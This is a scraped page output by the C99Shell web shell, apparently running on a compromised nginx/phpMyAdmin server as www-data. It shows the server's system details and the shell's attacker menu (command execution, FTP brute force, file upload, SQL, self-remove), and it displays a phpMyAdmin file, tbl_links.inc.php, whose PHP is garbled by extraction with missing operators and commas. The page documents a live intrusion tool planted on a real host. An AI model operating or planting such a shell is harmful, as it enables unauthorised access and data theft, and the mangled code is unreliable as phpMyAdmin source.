!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpMY/libraries/   drwxrwxr-x
Free 83.33 GB of 96.73 GB (86.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tbl_links.inc.php (3.62 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 *
 * @package PhpMyAdmin
 */
if (! defined('PHPMYADMIN')) {
    exit;
}

/**
 * Check parameters
 */
require_once './libraries/common.inc.php';

PMA_checkParameters(array('db''table'));

/**
 * Prepares links
 */
require_once './libraries/bookmark.lib.php';


/**
 * Set parameters for links
 */
$url_params = array();
$url_params['db']    = $db;
$url_params['table'] = $table;

/**
 * Defines the urls to return to in case of error in a sql statement
 */
$err_url_0 $cfg['DefaultTabDatabase'] . PMA_generate_common_url(array('db' => $db,));
$err_url   $cfg['DefaultTabTable'] . PMA_generate_common_url($url_params);

/**
 * Displays headers
 */
require_once './libraries/header.inc.php';

/**
 * Ensure that $db_is_information_schema is not null
 */
if (! isset($db_is_information_schema)) {
    
$db_is_information_schema false;
}

/**
 * Displays links
 */
$tabs = array();

$tabs['browse']['icon'] = 'b_browse.png';
$tabs['browse']['text'] = __('Browse');
$tabs['browse']['link'] = 'sql.php';
$tabs['browse']['args']['pos'] = 0;

$tabs['structure']['icon'] = 'b_props.png';
$tabs['structure']['link'] = 'tbl_structure.php';
$tabs['structure']['text'] = __('Structure');

$tabs['sql']['icon'] = 'b_sql.png';
$tabs['sql']['link'] = 'tbl_sql.php';
$tabs['sql']['text'] = __('SQL');

$tabs['search']['icon'] = 'b_search.png';
$tabs['search']['text'] = __('Search');
$tabs['search']['link'] = 'tbl_select.php';

if (!
$db_is_information_schema) {
    
$tabs['insert']['icon'] = 'b_insrow.png';
    
$tabs['insert']['link'] = 'tbl_change.php';
    
$tabs['insert']['text'] = __('Insert');
}

$tabs['export']['icon'] = 'b_tblexport.png';
$tabs['export']['link'] = 'tbl_export.php';
$tabs['export']['args']['single_table'] = 'true';
$tabs['export']['text'] = __('Export');

/**
 * Don't display "Import" and "Operations"
 * for views and information_schema
 */
if (! $tbl_is_view && !$db_is_information_schema) {
    
$tabs['import']['icon'] = 'b_tblimport.png';
    
$tabs['import']['link'] = 'tbl_import.php';
    
$tabs['import']['text'] = __('Import');

    
$tabs['operation']['icon'] = 'b_tblops.png';
    
$tabs['operation']['link'] = 'tbl_operations.php';
    
$tabs['operation']['text'] = __('Operations');
}
if (
PMA_Tracker::isActive()) {
    
$tabs['tracking']['icon'] = 'eye.png';
    
$tabs['tracking']['text'] = __('Tracking');
    
$tabs['tracking']['link'] = 'tbl_tracking.php';
}
if (!
$db_is_information_schema && !PMA_DRIZZLE) {
    if (
PMA_currentUserHasPrivilege('TRIGGER'$db$table) && ! PMA_Table::isView($db$table)) {
        
$tabs['triggers']['link'] = 'tbl_triggers.php';
        
$tabs['triggers']['text'] = __('Triggers');
        
$tabs['triggers']['icon'] = 'b_triggers.png';
    }
}

/**
 * Views support a limited number of operations
 */
if ($tbl_is_view && !$db_is_information_schema) {
    
$tabs['operation']['icon'] = 'b_tblops.png';
    
$tabs['operation']['link'] = 'view_operations.php';
    
$tabs['operation']['text'] = __('Operations');
}

if (
$table_info_num_rows == && !$tbl_is_view) {
    
$tabs['browse']['warning'] = __('Table seems to be empty!');
    
$tabs['search']['warning'] = __('Table seems to be empty!');
}

echo 
PMA_generate_html_tabs($tabs$url_params);
unset(
$tabs);

if (
PMA_Tracker::isActive() and PMA_Tracker::isTracked($GLOBALS["db"], $GLOBALS["table"])) {
    
$msg PMA_Message::notice('<a href="tbl_tracking.php?'.$url_query.'">'.sprintf(__('Tracking of %s.%s is activated.'), htmlspecialchars($GLOBALS["db"]), htmlspecialchars($GLOBALS["table"])).'</a>');
    
$msg->display();
}

/**
 * Displays a message
 */
if (!empty($message)) {
    
PMA_showMessage($message);
    unset(
$message);
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0047 ]--